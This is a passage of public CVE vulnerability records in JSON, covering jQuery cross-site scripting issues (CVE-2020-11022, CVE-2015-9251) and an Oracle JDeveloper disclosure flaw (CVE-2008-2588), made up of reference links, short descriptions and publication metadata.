"https://security.netapp.com/advisory/ntap-20200511-0006/", }, { url: "https://www.drupal.org/sa-core-2020-002", }, { name: "openSUSE-SU-2020:1060", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { name: "GLSA-202007-03", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202007-03", }, { name: "openSUSE-SU-2020:1106", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { name: "[airflow-commits] 20200820 [GitHub] [airflow] breser opened a new issue #10429: jquery dependency needs to be updated to 3.5.0 or newer", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { name: "FEDORA-2020-fbb94073a1", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { name: "FEDORA-2020-0b32a59b54", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { name: "FEDORA-2020-fe94df8c34", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "[flink-issues] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-dev] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: 
"https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { name: "openSUSE-SU-2020:1888", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { name: "[flink-issues] 20201129 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { url: "https://www.tenable.com/security/tns-2020-11", }, { url: "https://www.tenable.com/security/tns-2020-10", }, { name: "[flink-issues] 20210209 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210209 [jira] [Comment Edited] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { name: "[debian-lts-announce] 20210326 [SECURITY] [DLA 2608-1] jquery security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { name: "[flink-issues] 20210422 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210422 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: 
"https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { url: "https://www.tenable.com/security/tns-2021-10", }, { url: "https://www.tenable.com/security/tns-2021-02", }, { url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "[flink-issues] 20211031 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], source: { advisory: "GHSA-gxr4-xjj5-5px2", discovery: "UNKNOWN", }, title: "Potential XSS vulnerability in jQuery", }, }, cveMetadata: { assignerOrgId: 
"a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2020-11022", datePublished: "2020-04-29T00:00:00", dateReserved: "2020-03-30T00:00:00", dateUpdated: "2024-08-04T11:21:14.453Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2008-2588
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html | x_refsource_CONFIRM |
| http://www.securitytracker.com/id?1021054 | vdb-entry, x_refsource_SECTRACK |
| http://secunia.com/advisories/32291 | third-party-advisory, x_refsource_SECUNIA |
| http://www.vupen.com/english/advisories/2008/2825 | vdb-entry, x_refsource_VUPEN |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/45877 | vdb-entry, x_refsource_XF |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T09:05:30.291Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { name: "1021054", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id?1021054", }, { name: "32291", tags: [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred", ], url: "http://secunia.com/advisories/32291", }, { name: "ADV-2008-2825", tags: [ "vdb-entry", "x_refsource_VUPEN", "x_transferred", ], url: "http://www.vupen.com/english/advisories/2008/2825", }, { name: "oracle-jdeveloper-info-disclosure(45877)", tags: [ "vdb-entry", "x_refsource_XF", "x_transferred", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2008-10-14T00:00:00", descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-08-07T12:57:01", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { name: "1021054", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id?1021054", }, { name: "32291", tags: [ "third-party-advisory", "x_refsource_SECUNIA", ], url: "http://secunia.com/advisories/32291", }, { name: "ADV-2008-2825", tags: [ "vdb-entry", "x_refsource_VUPEN", ], url: 
"http://www.vupen.com/english/advisories/2008/2825", }, { name: "oracle-jdeveloper-info-disclosure(45877)", tags: [ "vdb-entry", "x_refsource_XF", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2008-2588", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { name: "1021054", refsource: "SECTRACK", url: "http://www.securitytracker.com/id?1021054", }, { name: "32291", refsource: "SECUNIA", url: "http://secunia.com/advisories/32291", }, { name: "ADV-2008-2825", refsource: "VUPEN", url: "http://www.vupen.com/english/advisories/2008/2825", }, { name: "oracle-jdeveloper-info-disclosure(45877)", refsource: "XF", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2008-2588", datePublished: "2008-10-14T21:00:00", dateReserved: "2008-06-09T00:00:00", dateUpdated: "2024-08-07T09:05:30.291Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2015-9251
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-06T08:43:41.697Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "105658", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/105658", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_FULLDISC", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[flink-user] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-dev] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Re: Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: 
"https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2020:0481", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { name: "RHSA-2020:0729", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { name: "openSUSE-SU-2020:0395", tags: [ "vendor-advisory", "x_refsource_SUSE", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: 
"https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/issues/2432", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/pull/2588", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: 
"https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.tenable.com/security/tns-2019-08", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-01-18T00:00:00", descriptions: [ { lang: "en", value: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2021-01-08T11:06:16", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "105658", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/105658", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ 
"mailing-list", "x_refsource_FULLDISC", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[flink-user] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-dev] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Re: Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security 
vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2020:0481", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { name: "RHSA-2020:0729", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { name: "openSUSE-SU-2020:0395", tags: [ "vendor-advisory", "x_refsource_SUSE", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/issues/2432", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { tags: [ "x_refsource_MISC", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/pull/2588", }, { tags: [ "x_refsource_MISC", ], url: 
"https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { tags: [ "x_refsource_MISC", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.tenable.com/security/tns-2019-08", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2015-9251", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the 
dataType option, causing text/javascript responses to be executed.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "105658", refsource: "BID", url: "http://www.securityfocus.com/bid/105658", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/18", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", refsource: "FULLDISC", url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", refsource: "FULLDISC", url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", refsource: "FULLDISC", url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[flink-user] 20190811 Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E", }, { name: "[flink-dev] 20190811 Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Re: Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", refsource: "MLIST", url: 
"https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2020:0481", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { name: "RHSA-2020:0729", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { name: "openSUSE-SU-2020:0395", refsource: "SUSE", url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://github.com/jquery/jquery/issues/2432", refsource: "MISC", url: "https://github.com/jquery/jquery/issues/2432", }, { name: 
"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", refsource: "MISC", url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { name: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", refsource: "MISC", url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { name: "https://snyk.io/vuln/npm:jquery:20150627", refsource: "MISC", url: "https://snyk.io/vuln/npm:jquery:20150627", }, { name: "https://github.com/jquery/jquery/pull/2588", refsource: "MISC", url: "https://github.com/jquery/jquery/pull/2588", }, { name: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", refsource: "MISC", url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { name: 